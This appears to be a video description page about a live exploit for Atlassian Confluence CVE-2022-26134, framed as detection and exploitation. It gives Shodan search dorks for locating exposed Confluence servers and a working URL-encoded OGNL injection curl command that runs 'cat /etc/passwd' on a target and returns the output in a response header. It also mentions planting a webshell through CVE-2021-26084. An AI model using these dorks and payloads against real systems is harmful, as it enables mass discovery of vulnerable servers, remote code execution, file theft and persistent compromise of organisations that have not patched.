Atlassian Confluence Zero-day RCE || Detection and Exploitation|| Jira || CVE-2022-26134|| live ||

Опубликовано: 09 Июнь 2022
на канале: AJAK Cybersecurity

522

Hello Guys this video is about a recent flaw in Atlassian Confluence Zero-day RCE, Detection and Exploitation have been explained
CVE-2022-26134
Severity: Critical

Shodan Dorks:
http.component:"atlassian confluence"
http.favicon.hash:-305179312"
http.title:"Log In - Confluence" 200
http.component:"atlassian confluence" http.title:"Log In - Confluence" 200
http.favicon.hash:-305179312 200

Curl Command:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"

Webshll Access:
Here is an attack via CVE-2021-26084 that I was checking on 2022-05-16 that allowed to create a webshell in ./confluence/testAnt.jsp

#bugbounty #jira #RCE #Zeroday